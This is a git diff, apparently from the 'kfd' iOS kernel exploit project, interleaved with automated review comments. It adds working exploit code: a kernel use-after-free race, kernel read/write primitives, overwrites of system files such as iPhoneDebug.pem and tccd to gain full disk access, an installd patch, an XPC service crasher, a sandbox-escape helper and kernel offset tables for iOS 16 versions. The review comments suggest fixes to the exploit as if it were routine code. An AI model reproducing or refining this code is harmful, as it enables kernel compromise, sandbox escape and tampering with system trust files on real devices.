assert_bsd(mlock((void*)(vme2_dst_address), landa_vme2_size)); + + /* + * STEP 2: + * + * Trigger the race condition between vm_copy() in the main thread and mlock() in the spinner thread. 
+ */ + pthread_t spinner_thread = NULL; + assert_bsd(pthread_create(&spinner_thread, NULL, landa_helper_spinner_pthread, kfd)); + + while (!atomic_load(&landa->spinner_thread_started)) { + usleep(10); + } + + assert_mach(vm_copy(mach_task_self(), src_address, copy_size, dst_address)); + atomic_store(&landa->main_thread_returned, true); + assert_bsd(pthread_join(spinner_thread, NULL)); + + /* + * STEP 3: + * + * Deallocate dst_vme_4, which will in turn deallocate the last reference of dst_vmo_3. + * Therefore, dst_vmo_3 will be reaped and its pages put back on the free list. + * However, we now have a PUAF on up to X of those pages in the VA range of dst_vme_3. + */ + assert_mach(vm_deallocate(mach_task_self(), vme4_dst_address, landa_vme4_size)); + + for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { + kfd->puaf.puaf_pages_uaddr[i] = vme3_dst_address + pages(i); + } +} + +void landa_cleanup(struct kfd* kfd) +{ + struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); + u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); + u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); + + u64 min_puaf_page_uaddr = min(kread_page_uaddr, kwrite_page_uaddr); + u64 max_puaf_page_uaddr = max(kread_page_uaddr, kwrite_page_uaddr); + + assert_mach(vm_deallocate(mach_task_self(), landa->copy_src_address, landa->copy_size)); + + vm_address_t address1 = landa->copy_dst_address; + vm_size_t size1 = min_puaf_page_uaddr - landa->copy_dst_address; + assert_mach(vm_deallocate(mach_task_self(), address1, size1)); + + vm_address_t address2 = max_puaf_page_uaddr + pages(1); + vm_size_t size2 = (landa->copy_dst_address + landa->copy_size) - address2; + assert_mach(vm_deallocate(mach_task_self(), address2, size2)); + + /* + * No middle block if the kread and kwrite pages are the same or back-to-back. 
+ */ + if ((max_puaf_page_uaddr - min_puaf_page_uaddr) > pages(1)) { + vm_address_t address3 = min_puaf_page_uaddr + pages(1); + vm_size_t size3 = (max_puaf_page_uaddr - address3); + assert_mach(vm_deallocate(mach_task_self(), address3, size3)); + } +} + +void landa_free(struct kfd* kfd) +{ + u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); + u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); + + assert_mach(vm_deallocate(mach_task_self(), kread_page_uaddr, pages(1))); + if (kwrite_page_uaddr != kread_page_uaddr) { + assert_mach(vm_deallocate(mach_task_self(), kwrite_page_uaddr, pages(1))); + } +} + +/* + * Helper landa functions. + */ + +void* landa_helper_spinner_pthread(void* arg) +{ + struct kfd* kfd = (struct kfd*)(arg); + struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); + + atomic_store(&landa->spinner_thread_started, true); + + while (!atomic_load(&landa->main_thread_returned)) { + kern_return_t kret = mlock((void*)(landa->copy_dst_address), landa->copy_size); + assert((kret == KERN_SUCCESS) || ((kret == (-1)) && (errno == ENOMEM))); + if (kret == KERN_SUCCESS) { + break; + } + } + + return NULL; +} + +#endif /* landa_h */ diff --git a/kfd/overwrite/fun.h b/kfd/overwrite/fun.h new file mode 100644 index 00000000..0fa54758 --- /dev/null +++ b/kfd/overwrite/fun.h @@ -0,0 +1,15 @@ +// +// fun.h +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/25. +// + +#ifndef fun_h +#define fun_h + +#include + +int do_fun(void); + +#endif /* fun_h */ diff --git a/kfd/overwrite/fun.m b/kfd/overwrite/fun.m new file mode 100644 index 00000000..ba20cd4c --- /dev/null +++ b/kfd/overwrite/fun.m 
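Review bot: In `landa_helper_spinner_pthread` the result of `mlock()` is stored in a `kern_return_t` and compared with `KERN_SUCCESS`, although `mlock()` is a BSD call returning `int` 0 or -1 with `errno`, as the `errno == ENOMEM` test on the next line already assumes. It works only because both success values are 0; `int ret = mlock((void*)(landa->copy_dst_address), landa->copy_size);` with `ret == 0` keeps the Mach and BSD error domains apart. The check on the failure case is a plain `assert`, so if the project is ever built with `NDEBUG` an unexpected `errno` would be ignored and the loop would keep spinning until `main_thread_returned` is set. `landa_run` also never resets `spinner_thread_started` or `main_thread_returned`, so it presumably relies on `landa_init` zeroing the struct before every run; a comment saying so would help.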
@@ -0,0 +1,42 @@ +// +// fun.c +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/25. +// + +#include "krw.h" +#include "offsets.h" +#include +#import +#import +#import +#include +#include +#include +#include +#include +#include "proc.h" +#include "vnode.h" +#include "grant_full_disk_access.h" +#include "thanks_opa334dev_htrowii.h" +#include "utils.h" + +int do_fun(void) { + + _offsets_init(); + + uint64_t kslide = get_kslide(); + uint64_t kbase = 0xfffffff007004000 + kslide; + printf("[i] Kernel base: 0x%llx\n", kbase); + printf("[i] Kernel slide: 0x%llx\n", kslide); + uint64_t kheader64 = kread64(kbase); + printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64); + + pid_t myPid = getpid(); + uint64_t selfProc = getProc(myPid); + printf("[i] self proc: 0x%llx\n", selfProc); + funVnodeOverwrite2("/System/Library/Lockdown/iPhoneDebug.pem", [NSString stringWithFormat:@"%@%@", NSBundle.mainBundle.bundlePath, @"/files/cert.pem"].UTF8String); + + return 0; +} diff --git a/kfd/fun/grant_full_disk_access.h b/kfd/overwrite/grant_full_disk_access.h similarity index 51% rename from kfd/fun/grant_full_disk_access.h rename to kfd/overwrite/grant_full_disk_access.h index d57c07d6..31a99b94 100644 --- a/kfd/fun/grant_full_disk_access.h +++ b/kfd/overwrite/grant_full_disk_access.h @@ -1,5 +1,5 @@ #import /// Uses kfd exploit to grant the current app read/write access outside the sandbox. -void kfd_grant_full_disk_access(void (^_Nonnull completion)(NSError* _Nullable)); -bool kfd_patch_installd(void); +void grant_full_disk_access(void (^_Nonnull completion)(NSError* _Nullable)); +bool patch_installd(void); diff --git a/kfd/fun/grant_full_disk_access.m b/kfd/overwrite/grant_full_disk_access.m similarity index 97% rename from kfd/fun/grant_full_disk_access.m rename to kfd/overwrite/grant_full_disk_access.m index 9fc068b2..0d9d855d 100644 --- a/kfd/fun/grant_full_disk_access.m +++ b/kfd/overwrite/grant_full_disk_access.m 
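Review bot: `do_fun()` replaces `/System/Library/Lockdown/iPhoneDebug.pem` with `files/cert.pem` from the app bundle, and nothing in the file states what that certificate is, where it came from, or how the original file is restored. A change that swaps a system trust file for a bundled one should document the certificate's provenance and the rollback path in a comment next to the call. The return value of `funVnodeOverwrite2` is discarded and `do_fun` returns 0 unconditionally, so a caller cannot tell whether the system file was modified; the same goes for `getProc`, whose result is only printed. The header comment still names the file `fun.c` although it is added as `fun.m`.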
@@ -328,11 +328,11 @@ static bool overwrite_file(int fd, NSData* sourceData) { kwrite32(to_vnode + off_vnode_v_writecount, to_vnode_v_writecount + 1); printf("[+] overwrite_file vnode->v_writecount: %d\n", kread32(to_vnode + off_vnode_v_writecount)); } - /* + for (int off = 0; off < sourceData.length; off += 0x4000) { bool success = false; for (int i = 0; i < 2; i++) { - if (kfd_unaligned_copy_switch_race( + if (unaligned_copy_switch_race( fd, off, sourceData.bytes + off, off + 0x4000 > sourceData.length ? sourceData.length - off : 0x4000, false)) { success = true; @@ -344,9 +344,7 @@ static bool overwrite_file(int fd, NSData* sourceData) { kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); return false; } - }*/ - [sourceData writeToFile: [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] atomically: true]; - funVnodeOverwriteFile((char *) [[NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] UTF8String], "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd"); + } kwrite32(fileglob + off_fg_flag, O_RDONLY); kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); return true; @@ -375,7 +373,7 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t } if (!overwrite_file(fd, sourceData)) { - //overwrite_file(fd, originalData); + overwrite_file(fd, originalData); munmap(targetMap, targetLength); completion( nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess" @@ -388,11 +386,11 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t } munmap(targetMap, targetLength); - kfd_xpc_crasher("com.apple.tccd"); + xpc_crasher("com.apple.tccd"); sleep(1); call_tccd(^(NSString* _Nullable extension_token) { overwrite_file(fd, originalData); - kfd_xpc_crasher("com.apple.tccd"); + xpc_crasher("com.apple.tccd"); NSError* returnError = nil; if (extension_token == nil) { returnError = 
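Review bot: The rollback re-enabled in `grant_full_disk_access_impl`, `overwrite_file(fd, originalData);`, ignores its `bool` result, so a failed restore leaves the target file in a modified state while the completion handler reports only the first error. Check the result and report it, e.g. `if (!overwrite_file(fd, originalData)) { NSLog(@"[-] restoring original file contents failed"); }`, or fold it into the `NSError` passed to `completion`. The same unchecked call sits in the `call_tccd` completion block in the `@@ -388,11 +386,11 @@` hunk. Both functions start and end outside these hunks.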
@@ -415,7 +413,7 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t }); } -void kfd_grant_full_disk_access(void (^completion)(NSError* _Nullable)) { +void grant_full_disk_access(void (^completion)(NSError* _Nullable)) { if (!NSClassFromString(@"NSPresentationIntent")) { // class introduced in iOS 15.0. // TODO(zhuowei): maybe check the actual OS version instead? @@ -476,7 +474,7 @@ void kfd_grant_full_disk_access(void (^completion)(NSError* _Nullable)) { uint64_t offset_return_true; }; -struct installd_remove_app_limit_offsets kfd_gAppLimitOffsets = { +struct installd_remove_app_limit_offsets gAppLimitOffsets = { .offset_objc_method_list_t_MIInstallableBundle = 0x519b0, .offset_objc_class_rw_t_MIInstallableBundle_baseMethods = 0x804e8, .offset_data_const_end_padding = 0x79c38, @@ -639,7 +637,7 @@ bool patch_installd() { return false; } munmap(targetMap, targetLength); - kfd_xpc_crasher("com.apple.mobile.installd"); + xpc_crasher("com.apple.mobile.installd"); sleep(1); // TODO(zhuowei): for now we revert it once installd starts diff --git a/kfd/fun/helpers.h b/kfd/overwrite/helpers.h similarity index 55% rename from kfd/fun/helpers.h rename to kfd/overwrite/helpers.h index 47f8170c..1c213423 100644 --- a/kfd/fun/helpers.h +++ b/kfd/overwrite/helpers.h @@ -1,11 +1,11 @@ #ifndef helpers_h #define helpers_h -char* kfd_get_temp_file_path(void); -void kfd_test_nsexpressions(void); -char* kfd_set_up_tmp_file(void); +char* get_temp_file_path(void); +void test_nsexpressions(void); +char* set_up_tmp_file(void); -void kfd_xpc_crasher(char* service_name); +void xpc_crasher(char* service_name); void restartBackboard(void); void restartFrontboard(void); diff --git a/kfd/fun/helpers.m b/kfd/overwrite/helpers.m similarity index 89% rename from kfd/fun/helpers.m rename to kfd/overwrite/helpers.m index 5a257369..10697276 100644 --- a/kfd/fun/helpers.m +++ b/kfd/overwrite/helpers.m 
@@ -3,13 +3,13 @@ #include #include -char* kfd_get_temp_file_path(void) { +char* get_temp_file_path(void) { return strdup([[NSTemporaryDirectory() stringByAppendingPathComponent:@"AAAAs"] fileSystemRepresentation]); } // create a read-only test file we can target: -char* kfd_set_up_tmp_file(void) { - char* path = kfd_get_temp_file_path(); +char* set_up_tmp_file(void) { + char* path = get_temp_file_path(); printf("path: %s\n", path); FILE* f = fopen(path, "w"); @@ -34,7 +34,7 @@ mach_msg_port_descriptor_t reply_port; }; -mach_port_t kfd_get_send_once(mach_port_t recv) { +mach_port_t get_send_once(mach_port_t recv) { mach_port_t so = MACH_PORT_NULL; mach_msg_type_name_t type = 0; kern_return_t err = mach_port_extract_right(mach_task_self(), recv, MACH_MSG_TYPE_MAKE_SEND_ONCE, &so, &type); @@ -51,7 +51,7 @@ mach_port_t kfd_get_send_once(mach_port_t recv) { // (in the exploit for this: https://googleprojectzero.blogspot.com/2019/04/splitting-atoms-in-xnu.html ) -void kfd_xpc_crasher(char* service_name) { +void xpc_crasher(char* service_name) { mach_port_t client_port = MACH_PORT_NULL; mach_port_t reply_port = MACH_PORT_NULL; @@ -75,8 +75,8 @@ void kfd_xpc_crasher(char* service_name) { return; } - mach_port_t so0 = kfd_get_send_once(client_port); - mach_port_t so1 = kfd_get_send_once(client_port); + mach_port_t so0 = get_send_once(client_port); + mach_port_t so1 = get_send_once(client_port); // insert a send so we maintain the ability to send to this port err = mach_port_insert_right(mach_task_self(), client_port, client_port, MACH_MSG_TYPE_MAKE_SEND); 
@@ -130,11 +130,11 @@ void kfd_xpc_crasher(char* service_name) { } void restartBackboard(void) { - kfd_xpc_crasher("com.apple.backboard.TouchDeliveryPolicyServer"); + xpc_crasher("com.apple.backboard.TouchDeliveryPolicyServer"); } void restartFrontboard(void) { // NOTE: This will not kill your app on some versions // You may also need to exit(0) afterwards - kfd_xpc_crasher("com.apple.frontboard.systemappservices"); + xpc_crasher("com.apple.frontboard.systemappservices"); } diff --git a/kfd/fun/krw.c b/kfd/overwrite/krw.c similarity index 100% rename from kfd/fun/krw.c rename to kfd/overwrite/krw.c diff --git a/kfd/fun/krw.h b/kfd/overwrite/krw.h similarity index 99% rename from kfd/fun/krw.h rename to kfd/overwrite/krw.h index 48d18979..ede1a510 100644 --- a/kfd/fun/krw.h +++ b/kfd/overwrite/krw.h @@ -7,8 +7,10 @@ #ifndef krw_h #define krw_h -#include "fun.h" + #include +#include "fun.h" + uint64_t do_kopen(uint64_t puaf_pages, uint64_t puaf_method, uint64_t kread_method, uint64_t kwrite_method); void do_kclose(void); diff --git a/kfd/fun/offsets.h b/kfd/overwrite/offsets.h similarity index 76% rename from kfd/fun/offsets.h rename to kfd/overwrite/offsets.h index b7f81e88..354fb5ca 100644 --- a/kfd/fun/offsets.h +++ b/kfd/overwrite/offsets.h @@ -41,6 +41,7 @@ extern uint32_t off_cr_svgid; extern uint32_t off_cr_gmuid; extern uint32_t off_cr_flags; extern uint32_t off_task_t_flags; +extern uint32_t off_task_itk_space; extern uint32_t off_fd_ofiles; extern uint32_t off_fd_cdir; extern uint32_t off_fp_glob; 
@@ -71,13 +72,20 @@ extern uint32_t off_mount_mnt_flag; extern uint32_t off_specinfo_si_flags; extern uint32_t off_namecache_nc_vp; extern uint32_t off_namecache_nc_child_tqe_prev; - -//uint32_t off_p_pfd = 0xf8; -//uint32_t off_fd_ofiles = 0; -//uint32_t off_fp_fglob = 0x10; -//uint32_t off_fg_data = 0x38; -//uint32_t off_vnode_iocount = 0x64; -//uint32_t off_vnode_usecount = 0x60; -//uint32_t off_vnode_vflags = 0x54; +extern uint32_t off_ipc_space_is_table; +extern uint32_t off_ubc_info_cs_blobs; +extern uint32_t off_ubc_info_cs_add_gen; +extern uint32_t off_cs_blob_csb_pmap_cs_entry; +extern uint32_t off_cs_blob_csb_cdhash; +extern uint32_t off_cs_blob_csb_flags; +extern uint32_t off_cs_blob_csb_teamid; +extern uint32_t off_cs_blob_csb_validation_category; +extern uint32_t off_pmap_cs_code_directory_ce_ctx; +extern uint32_t off_pmap_cs_code_directory_der_entitlements_size; +extern uint32_t off_pmap_cs_code_directory_trust; +extern uint32_t off_ipc_entry_ie_object; +extern uint32_t off_ipc_object_io_bits; +extern uint32_t off_ipc_object_io_references; +extern uint32_t off_ipc_port_ip_kobject; void _offsets_init(void); diff --git a/kfd/fun/offsets.m b/kfd/overwrite/offsets.m similarity index 87% rename from kfd/fun/offsets.m rename to kfd/overwrite/offsets.m index 491f04dd..3878e4b7 100644 --- a/kfd/fun/offsets.m +++ b/kfd/overwrite/offsets.m @@ -57,14 +57,11 @@ uint32_t off_vnode_v_data = 0; uint32_t off_vnode_v_kusecount = 0; uint32_t off_vnode_v_references = 0; -uint32_t off_vnode_v_lflag = 0; -uint32_t off_vnode_v_owner = 0; uint32_t off_vnode_v_parent = 0; uint32_t off_vnode_v_label = 0; uint32_t off_vnode_v_cred = 0; uint32_t off_vnode_v_writecount = 0; uint32_t off_vnode_v_type = 0; -uint32_t off_vnode_vu_ubcinfo = 0; uint32_t off_mount_mnt_data = 0; uint32_t off_mount_mnt_fsowner = 0; uint32_t off_mount_mnt_fsgroup = 0; 
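Review bot: This hunk and the `@@ -41,6 +41,7 @@` hunk before it declare a group of new `extern uint32_t` offsets (`off_task_itk_space`, `off_ipc_space_is_table`, `off_ubc_info_cs_blobs`, `off_ipc_port_ip_kobject` and others), but none of the `offsets.m` hunks in this commit adds a definition for them or assigns them in `_offsets_init`. Unless the definitions already exist in the unchanged part of `offsets.m`, any use will fail at link time, and if they do exist they stay at their initial value for every supported version. In the other direction, the first `offsets.m` hunk deletes the definitions of `off_vnode_v_lflag`, `off_vnode_v_owner` and `off_vnode_vu_ubcinfo`; whether `offsets.h` still declares them is not visible here and should be checked. Declarations and definitions are best added or removed together in the same commit.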
@@ -77,25 +74,25 @@ #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame) void _offsets_init(void) { - if (SYSTEM_VERSION_EQUAL_TO(@"16.1.2")) { - printf("[i] offsets selected for iOS 16.1.2\n"); + if(SYSTEM_VERSION_EQUAL_TO(@"16.1.2")||SYSTEM_VERSION_EQUAL_TO(@"16.2")||SYSTEM_VERSION_EQUAL_TO(@"16.3")||SYSTEM_VERSION_EQUAL_TO(@"16.3.1")) { + NSLog(@"[i] offsets selected for iOS 16.1.2"); //iPhone 14 Pro 16.1.2 offsets //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_internal.h#L273 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; - off_p_ppid = 0x20;//ok - off_p_original_ppid = 0x24;//ok - off_p_pgrpid = 0x28;//ok + off_p_ppid = 0x20; + off_p_original_ppid = 0x24; + off_p_pgrpid = 0x28; off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44;//ok - off_p_puniqueid = 0x48;//ok + off_p_sessionid = 0x44; + off_p_puniqueid = 0x48; off_p_pid = 0x60; off_p_pfd = 0xf8; off_p_textvp = 0x350; @@ -130,8 +127,6 @@ void _offsets_init(void) { off_fd_ofiles = 0; off_fd_cdir = 0x20; // new one! https://github.com/Baw-Appie/KernBypass/blob/69e5ae6baf04d0978358feee57eca8b8bc1382ed/kernel.h#L390 try these - off_fd_cdir = 0x20; - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L125 off_fp_glob = 0x10; 
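Review bot: The widened condition in `_offsets_init` now matches 16.1.2, 16.2, 16.3 and 16.3.1, but the message is still the fixed string `NSLog(@"[i] offsets selected for iOS 16.1.2")`, so the log names the wrong version on three of the four. Log the detected version, e.g. `NSLog(@"[i] offsets selected for iOS %@ (16.1.2 table)", [[UIDevice currentDevice] systemVersion]);`. The `@@ -169,33 +164,33 @@` hunk has the same problem for 16.5.1 under the "iOS 16.6" message; in that branch `off_p_name` also changes from `0x579` to `0x381` and the `//ok` markers are dropped, with no note on which device or build the new value was checked against. `_offsets_init` continues outside the hunk.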
@@ -169,33 +164,33 @@ void _offsets_init(void) { off_namecache_nc_vp = 0x48; off_namecache_nc_child_tqe_prev = 0x10; - } else if (SYSTEM_VERSION_EQUAL_TO(@"16.6")) { - printf("[i] offsets selected for iOS 16.6\n"); - //iPhone SE 2 16.6 offsets + } else if (SYSTEM_VERSION_EQUAL_TO(@"16.6")||SYSTEM_VERSION_EQUAL_TO(@"16.5.1")) { + NSLog(@"[i] offsets selected for iOS 16.6"); + //iPhone 11 Pro 16.6 offsets //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_internal.h#L273 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 - off_p_list_le_prev = 0x8;//ok + off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; - off_p_ppid = 0x20;//ok - off_p_original_ppid = 0x24;//ok - off_p_pgrpid = 0x28;//ok + off_p_ppid = 0x20; + off_p_original_ppid = 0x24; + off_p_pgrpid = 0x28; off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44;//ok - off_p_puniqueid = 0x48;//ok - off_p_pid = 0x60;//ok - off_p_pfd = 0xf8;//p_fd__fd_ofiles? ok + off_p_sessionid = 0x44; + off_p_puniqueid = 0x48; + off_p_pid = 0x60; + off_p_pfd = 0xf8; off_p_textvp = 0x548; - off_p_name = 0x579;//ok + off_p_name = 0x381; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_ro.h#L59 - off_p_ro_p_csflags = 0x1c;//ok - off_p_ro_p_ucred = 0x20;//ok + off_p_ro_p_csflags = 0x1c; + off_p_ro_p_ucred = 0x20; off_p_ro_pr_proc = 0; off_p_ro_pr_task = 0x8; off_p_ro_t_flags_ro = 0x78; 
@@ -216,17 +211,17 @@ void _offsets_init(void) { off_cr_flags = 0x5c; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/task.h#L280 - off_task_t_flags = 0x3D0;//ok + off_task_t_flags = 0x3D0; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/filedesc.h#L138 off_fd_ofiles = 0; off_fd_cdir = 0x20; // new one! https://github.com/Baw-Appie/KernBypass/blob/69e5ae6baf04d0978358feee57eca8b8bc1382ed/kernel.h#L390 try these //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L125 - off_fp_glob = 0x10;//ok? + off_fp_glob = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L179 - off_fg_data = 0x38;//ok? + off_fg_data = 0x38; off_fg_flag = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/vnode_internal.h#L158 @@ -239,14 +234,11 @@ void _offsets_init(void) { off_vnode_v_data = 0xe0; off_vnode_v_kusecount = 0x5c; off_vnode_v_references = 0x5b; - off_vnode_v_lflag = 0x58; - off_vnode_v_owner = 0x68; off_vnode_v_parent = 0xc0; off_vnode_v_label = 0xe8; off_vnode_v_cred = 0x98; off_vnode_v_writecount = 0xb0; off_vnode_v_type = 0x70; - off_vnode_vu_ubcinfo = 0x78; //https://github.com/apple-oss-distributions/xnu/blob/main/bsd/sys/mount_internal.h#L108 off_mount_mnt_data = 0x11F; @@ -263,7 +255,7 @@ void _offsets_init(void) { off_namecache_nc_child_tqe_prev = 0x0; }else { - printf("[-] No matching offsets.\n"); + NSLog(@"[-] No matching offsets."); exit(EXIT_FAILURE); } } diff --git a/kfd/fun/proc.c b/kfd/overwrite/proc.c similarity index 90% rename from kfd/fun/proc.c rename to kfd/overwrite/proc.c index 6e2b9e2f..3d816ff2 100644 --- a/kfd/fun/proc.c +++ b/kfd/overwrite/proc.c @@ -20,6 +20,9 @@ uint64_t getProc(pid_t pid) { return proc; } proc = kread64(proc + off_p_list_le_prev); + if(!proc) { + return -1; + } } return 0; 
@@ -32,18 +35,23 @@ uint64_t getProcByName(char* nm) { uint64_t nameptr = proc + off_p_name; char name[32]; do_kread(nameptr, &name, 32); - //printf("[i] pid: %d, process name: %s\n", kread32(proc + off_p_pid), name); +// printf("[i] pid: %d, process name: %s\n", kread32(proc + off_p_pid), name); if(strcmp(name, nm) == 0) { return proc; } proc = kread64(proc + off_p_list_le_prev); + if(!proc) { + return -1; + } } return 0; } int getPidByName(char* nm) { - return kread32(getProcByName(nm) + off_p_pid); + uint64_t proc = getProcByName(nm); + if(proc == -1) return -1; + return kread32(proc + off_p_pid); } int funProc(uint64_t proc) { diff --git a/kfd/fun/proc.h b/kfd/overwrite/proc.h similarity index 100% rename from kfd/fun/proc.h rename to kfd/overwrite/proc.h diff --git a/kfd/fun/thanks_opa334dev_htrowii.h b/kfd/overwrite/thanks_opa334dev_htrowii.h similarity index 51% rename from kfd/fun/thanks_opa334dev_htrowii.h rename to kfd/overwrite/thanks_opa334dev_htrowii.h index 199e3331..c7def95d 100644 --- a/kfd/fun/thanks_opa334dev_htrowii.h +++ b/kfd/overwrite/thanks_opa334dev_htrowii.h @@ -7,8 +7,5 @@ #import uint64_t funVnodeOverwrite2(char* tofile, char* fromfile); -uint64_t funVnodeOverwriteWithBytes(const char* filename, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd); -void funVnodeSave(char* file); void kreadbuf(uint64_t kaddr, void* output, size_t size); uint64_t getTask(void); -uint64_t funVnodeOverwriteForManager(NSString* to, NSString* from); diff --git a/kfd/fun/thanks_opa334dev_htrowii.m b/kfd/overwrite/thanks_opa334dev_htrowii.m similarity index 100% rename from kfd/fun/thanks_opa334dev_htrowii.m rename to kfd/overwrite/thanks_opa334dev_htrowii.m diff --git a/kfd/overwrite/utils.h b/kfd/overwrite/utils.h new file mode 100644 index 00000000..8177fd8c --- /dev/null +++ b/kfd/overwrite/utils.h 
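Review bot: `getPidByName` tests only `proc == -1`, but `getProcByName` still ends with `return 0;` after its loop, so that result goes on to `kread32(proc + off_p_pid)` with a zero base. The commit leaves two failure values in both `getProcByName` and `getProc` (previous hunk): `-1` for a null list link and `0` at the end; either collapse them into one or check both, `if (proc == 0 || proc == (uint64_t)-1) return -1;`. Returning `-1` from a `uint64_t` function also relies on implicit conversion at every comparison, which a named constant such as `#define PROC_NOT_FOUND ((uint64_t)-1)` would make explicit. The loop headers of both functions are outside the hunks.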
@@ -0,0 +1,13 @@ +// +// utils.h +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/30. +// + +#include +#include +#include + +void HexDump(uint64_t addr, size_t size); +bool sandbox_escape_can_i_access_file(char* path, int mode); diff --git a/kfd/overwrite/utils.m b/kfd/overwrite/utils.m new file mode 100644 index 00000000..c43712e4 --- /dev/null +++ b/kfd/overwrite/utils.m 
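Review bot: `utils.h` is added without an include guard, unlike `fun.h` in the same commit (`#ifndef fun_h`) and `helpers.h` (`#ifndef helpers_h`); wrap it in `#ifndef utils_h` / `#define utils_h` / `#endif /* utils_h */`. The two prototypes also have no comments: `HexDump` takes an `addr` that `utils.m` passes to `kreadbuf`, and `sandbox_escape_can_i_access_file` passes `mode` to `access()`, so state that `addr` is a kernel address and that `mode` takes the `access(2)` mode bits.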
@@ -0,0 +1,90 @@ +// +// utils.m +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/30. +// + +#import +#import +#import +#import +#import +#import "proc.h" +#import "vnode.h" +#import "krw.h" +#import "helpers.h" +#import "offsets.h" +#import "thanks_opa334dev_htrowii.h" +#import "utils.h" + +uint64_t createFolderAndRedirect(uint64_t vnode, NSString *mntPath) { + [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; + [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; + uint64_t orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); + + return orig_to_v_data; +} + +uint64_t UnRedirectAndRemoveFolder(uint64_t orig_to_v_data, NSString *mntPath) { + funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); + [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; + + return 0; +} + +void HexDump(uint64_t addr, size_t size) { + void *data = malloc(size); + kreadbuf(addr, data, size); + char ascii[17]; + size_t i, j; + ascii[16] = '\0'; + for (i = 0; i < size; ++i) { + if ((i % 16) == 0) + { + printf("[0x%016llx+0x%03zx] ", addr, i); +// printf("[0x%016llx] ", i + addr); + } + + printf("%02X ", ((unsigned char*)data)[i]); + if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { + ascii[i % 16] = ((unsigned char*)data)[i]; + } else { + ascii[i % 16] = '.'; + } + if ((i+1) % 8 == 0 || i+1 == size) { + printf(" "); + if ((i+1) % 16 == 0) { + printf("| %s \n", ascii); + } else if (i+1 == size) { + ascii[(i+1) % 16] = '\0'; + if ((i+1) % 16 <= 8) { + printf(" "); + } + for (j = (i+1) % 16; j < 16; ++j) { + printf(" "); + } + printf("| %s \n", ascii); + } + } + } + free(data); +} + +bool sandbox_escape_can_i_access_file(char* path, int mode) { + NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; + uint64_t vnode = getVnodeAtPathByChdir([[NSString stringWithUTF8String:path] 
stringByDeletingLastPathComponent].UTF8String); + uint64_t orig_to_v_data = createFolderAndRedirect(vnode, mntPath); + + NSString *mountedPath = [NSString stringWithFormat:@"%@/%@", mntPath, [[NSString stringWithUTF8String:path] lastPathComponent]]; + + bool ret = false; + + if(access(mountedPath.UTF8String, mode) == 0) { + ret = true; + } + + UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); + + return ret; +} diff --git a/kfd/fun/vm_unaligned_copy_switch_race.c b/kfd/overwrite/vm_unaligned_copy_switch_race.c similarity index 98% rename from kfd/fun/vm_unaligned_copy_switch_race.c rename to kfd/overwrite/vm_unaligned_copy_switch_race.c index 3a442d76..4493a7a9 100644 --- a/kfd/fun/vm_unaligned_copy_switch_race.c +++ b/kfd/overwrite/vm_unaligned_copy_switch_race.c @@ -88,7 +88,7 @@ switcheroo_thread(__unused void *arg) return NULL; } -bool kfd_unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd) { +bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* 